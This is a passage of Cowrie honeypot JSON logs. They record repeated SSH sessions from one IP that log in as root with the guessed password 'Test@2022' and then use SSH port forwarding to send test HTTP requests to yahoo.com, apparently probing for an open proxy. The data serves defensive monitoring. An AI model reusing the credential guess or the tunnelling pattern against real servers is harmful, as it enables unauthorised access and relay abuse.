{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":13400,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:13400","sensor":"my-vps","timestamp":"2025-08-26T00:56:51.203096Z","session":"916873038af5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:51.260228Z","src_ip":"213.209.150.239","session":"916873038af5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:51.317628Z","src_ip":"213.209.150.239","session":"916873038af5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57831,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea8daac088b4","protocol":"ssh","message":"New connection: 213.209.150.239:57831 (1.2.3.4:22) [session: ea8daac088b4]","sensor":"my-vps","timestamp":"2025-08-26T00:56:51.373405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:51.374747Z","src_ip":"213.209.150.239","session":"ea8daac088b4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:51.431460Z","src_ip":"213.209.150.239","session":"ea8daac088b4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:51.714312Z","src_ip":"213.209.150.239","session":"ea8daac088b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":5210,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:5210","sensor":"my-vps","timestamp":"2025-08-26T00:56:51.772053Z","session":"ea8daac088b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:51.828882Z","src_ip":"213.209.150.239","session":"ea8daac088b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":16886,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:16886","sensor":"my-vps","timestamp":"2025-08-26T00:56:51.983198Z","session":"ea8daac088b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.039876Z","src_ip":"213.209.150.239","session":"ea8daac088b4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.097980Z","src_ip":"213.209.150.239","session":"ea8daac088b4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57893,"dst_ip":"1.2.3.4","dst_port":22,"session":"91c1210f8f75","protocol":"ssh","message":"New connection: 213.209.150.239:57893 (1.2.3.4:22) [session: 91c1210f8f75]","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.143913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.144629Z","src_ip":"213.209.150.239","session":"91c1210f8f75"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.191709Z","src_ip":"213.209.150.239","session":"91c1210f8f75"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.425461Z","src_ip":"213.209.150.239","session":"91c1210f8f75"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":32420,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:32420","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.473164Z","session":"91c1210f8f75"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.520187Z","src_ip":"213.209.150.239","session":"91c1210f8f75"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":239,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:239","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.657521Z","session":"91c1210f8f75"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.704720Z","src_ip":"213.209.150.239","session":"91c1210f8f75"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.752440Z","src_ip":"213.209.150.239","session":"91c1210f8f75"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57936,"dst_ip":"1.2.3.4","dst_port":22,"session":"692d406ac898","protocol":"ssh","message":"New connection: 213.209.150.239:57936 (1.2.3.4:22) [session: 692d406ac898]","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.808465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.809263Z","src_ip":"213.209.150.239","session":"692d406ac898"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:52.865993Z","src_ip":"213.209.150.239","session":"692d406ac898"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:53.147980Z","src_ip":"213.209.150.239","session":"692d406ac898"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":1972,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:1972","sensor":"my-vps","timestamp":"2025-08-26T00:56:53.206649Z","session":"692d406ac898"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:53.263528Z","src_ip":"213.209.150.239","session":"692d406ac898"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":23622,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:23622","sensor":"my-vps","timestamp":"2025-08-26T00:56:53.419116Z","session":"692d406ac898"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:53.476031Z","src_ip":"213.209.150.239","session":"692d406ac898"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:53.534021Z","src_ip":"213.209.150.239","session":"692d406ac898"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57988,"dst_ip":"1.2.3.4","dst_port":22,"session":"b76feaa33ca9","protocol":"ssh","message":"New connection: 213.209.150.239:57988 (1.2.3.4:22) [session: b76feaa33ca9]","sensor":"my-vps","timestamp":"2025-08-26T00:56:53.580359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:53.580970Z","src_ip":"213.209.150.239","session":"b76feaa33ca9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:53.628318Z","src_ip":"213.209.150.239","session":"b76feaa33ca9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:53.863515Z","src_ip":"213.209.150.239","session":"b76feaa33ca9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":25285,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:25285","sensor":"my-vps","timestamp":"2025-08-26T00:56:53.911762Z","session":"b76feaa33ca9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:53.959269Z","src_ip":"213.209.150.239","session":"b76feaa33ca9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":4658,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:4658","sensor":"my-vps","timestamp":"2025-08-26T00:56:54.097700Z","session":"b76feaa33ca9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:54.145019Z","src_ip":"213.209.150.239","session":"b76feaa33ca9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:54.193319Z","src_ip":"213.209.150.239","session":"b76feaa33ca9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58031,"dst_ip":"1.2.3.4","dst_port":22,"session":"13cd138afa4f","protocol":"ssh","message":"New connection: 213.209.150.239:58031 (1.2.3.4:22) [session: 13cd138afa4f]","sensor":"my-vps","timestamp":"2025-08-26T00:56:54.248787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:54.250311Z","src_ip":"213.209.150.239","session":"13cd138afa4f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:54.306885Z","src_ip":"213.209.150.239","session":"13cd138afa4f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:54.589372Z","src_ip":"213.209.150.239","session":"13cd138afa4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":14844,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:14844","sensor":"my-vps","timestamp":"2025-08-26T00:56:54.647243Z","session":"13cd138afa4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:54.703843Z","src_ip":"213.209.150.239","session":"13cd138afa4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":26905,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26905","sensor":"my-vps","timestamp":"2025-08-26T00:56:54.859116Z","session":"13cd138afa4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:54.915787Z","src_ip":"213.209.150.239","session":"13cd138afa4f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:54.973648Z","src_ip":"213.209.150.239","session":"13cd138afa4f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":58073,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ef25521e062","protocol":"ssh","message":"New connection: 213.209.150.239:58073 (1.2.3.4:22) [session: 7ef25521e062]","sensor":"my-vps","timestamp":"2025-08-26T00:56:55.029366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:55.029993Z","src_ip":"213.209.150.239","session":"7ef25521e062"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nist